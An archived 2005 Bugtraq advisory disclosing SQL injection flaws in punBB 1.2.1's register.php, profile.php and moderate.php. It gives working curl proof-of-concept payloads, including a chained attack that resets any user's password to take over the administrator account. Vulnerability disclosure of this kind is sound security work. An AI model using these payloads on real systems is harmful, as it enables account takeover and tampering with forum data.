Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple vulns in punBB

from [John Gumbel] Network Security [Permanent Link]
Subject: Multiple vulns in punBB
Date: Thu, 24 Feb 2005 20:21:09 +0000 
...

 - Johannes Gumbel

=================================================
   SQL Injections in punbb-1.2.1 register.php
=================================================

 Description
 -----------

A remote attacker can cause register.php to execute
arbitrary SQL statements by supplying malicous
values to the language or email parameter.

The email paramter is guarded by the function
is_valid_email but this function doesn't do any
real filtering and will pass any SQL statement
that is formatted correctly.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

This example only demonstrates the vulnerability in
the language paramter.

curl --form form_sent=1 --form req_username=sha --form req_password1=passwd 
--form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 
'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer

Will create a user with the language English, style
Oxygen and ip 0.0.0.0.

=======================================================
  Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================

 Description
 -----------

A remote attacker without an account can set the password
of any user on the system to NULL, effectivley shuting
them out of the system.

A user on the system can also inject an arbitrary
SQL statement using the change email feature. This has
occured because of a fault in the is_valid_email function
which returns true for strings that are not even close to
being a valid email.

This also affects systems using the magic_quotes_gpc
option in php.ini.

By combining these two an attacker with an account on
the forum can change the password for any user to anything
he/she wants to, gaining full access to the administrator
account.

 Proof of concept
 ----------------

Examples of the damage the DoS attack and arbitrary
SQL statement attacks can do on their own has been
omitted. This is a demonstration of their power when
combined.

Assumptions for this particular example:
 - There is a user on the system with id 3 that has
   username/password set to 'sha'/'passwd'.
 - The cookie is valid for sha on system
 - The system supports sha1.
 - The new password for the id 2 account is supposed to
   be 'newpass'.

curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form 
req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@punbb.com" 
http://target/profile.php?action=change_email\&id=3

This will push the sha1 encrypted password 'newpass'
into every users activate_string field. All that needs
to be done is pushing this field to the password field
of any user we want using the other bug.

curl http://target/profile.php?action=change_pass\&id=2\&key=

Now the account with user id 2 has the password 'newpass' set.

==============================================
  SQL Injections in punbb-1.2.1 moderate.php
==============================================

 Description
 -----------

Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted such that by simply adding a ;
or ' just before the comment "-- this won't show"
will cause the SQL query to crash demonstrating
the injection is possible.

Assumptions:
 - punbb_cookie contains identification of a
   moderator for forum with id 1.

Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show" 
--form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> 
target/moderate.php?fid=1\&tid=1

Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" 
--form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie 
punbb_cookie=<valid cookie> target/moderate.php?fid=1

Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" 
--form delete_topics=1 --form delete_topics_comply=1 --cookie 
punbb_cookie=<valid cookie> target/moderate.php?fid=1

Attacks open/close:
 curl --referer http://target/moderate.php --form "topics[0) -- this won't 
show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> 
target/moderate.php?fid=1
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple vulns in punBB, John Gumbel <=
Previous by Date:  RE: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability, PASTOR ADRIAN
Next by Date:  MDKSA-2005:046 - Updated uim packages fix vulnerability, Mandrakelinux Security Team
Previous by Thread:  [Security Bulletin] SSRT4694 HP-UX ftpd remote unauthorized access, Boren, Rich (SSRT)
Next by Thread:  MDKSA-2005:046 - Updated uim packages fix vulnerability, Mandrakelinux Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]